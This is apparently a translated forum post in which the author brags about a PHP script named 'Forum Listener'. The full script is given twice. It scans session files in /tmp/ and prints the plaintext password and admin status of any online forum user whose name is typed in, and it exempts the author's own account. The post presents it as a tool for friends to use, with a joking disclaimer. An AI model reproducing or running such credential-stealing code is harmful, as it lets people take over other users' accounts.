The reason why I can write this function is mainly to have a clear understanding of the session structure of the website, such as: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1", and I also know the location of the session and can upload files. So, I did a small hacker at that time, and my online friends can see the passwords, haha:
<?
function submit1(){
global $username;
print "<title>Forum Listener</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "You are too dark, are you? You check me?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "User pseudonym:".$name[2]."<br>User password:".$passwd[2]."<br>User mode:";
if($mode[1]==1)
print "<font color=red>Admin</font>";
else
print "General user";
print"<br><br>Stealing other people's passwords is an immoral act, please do it a little bit<br>";
$i=1;
break;
}}}}
if(!$i)
print "User:".$username." is really online? If you are sure, <a href='javascript:(-1)'>Please do it again</a>, don't type too much space!";
$d->close();
}
function login(){
?>
<html>
<head>
<title>Forum Listener</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>Forum Listener </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">When you see a user online you want to see his password, how do you do it? </td>
</tr>
<tr>
<td colspan="2">Let me tell you: it is to use this program. </td>
</tr>
<tr>
<td colspan="2"><font color=red>Soul: This program is a free program and I am not responsible for any losses caused by it. </font>
<br>But this problem may be blocked soon, so don’t use it secretly if you are alone. </td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>Please enter the username you want to check: <br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="I agree to the above statement and start searching">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>
<?
function submit1(){
global $username;
print "<title>Forum Listener</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "You are too dark, are you? You check me?";
return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "User pseudonym:".$name[2]."<br>User password:".$passwd[2]."<br>User mode:";
if($mode[1]==1)
print "<font color=red>Admin</font>";
else
print "General user";
print"<br><br>Stealing other people's passwords is an immoral act, please do it a little bit<br>";
$i=1;
break;
}}}}
if(!$i)
print "User:".$username." is really online? If you are sure, <a href='javascript:(-1)'>Please do it again</a>, don't type too much space!";
$d->close();
}
function login(){
?>
<html>
<head>
<title>Forum Listener</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>Forum Listener </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">When you see a user online you want to see his password, how do you do it? </td>
</tr>
<tr>
<td colspan="2">Let me tell you: it is to use this program. </td>
</tr>
<tr>
<td colspan="2"><font color=red>Soul: This program is a free program and I am not responsible for any losses caused by it. </font>
<br>But this problem may be blocked soon, so don’t use it secretly if you are alone. </td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>Please enter the username you want to check: <br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="I agree to the above statement and start searching">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>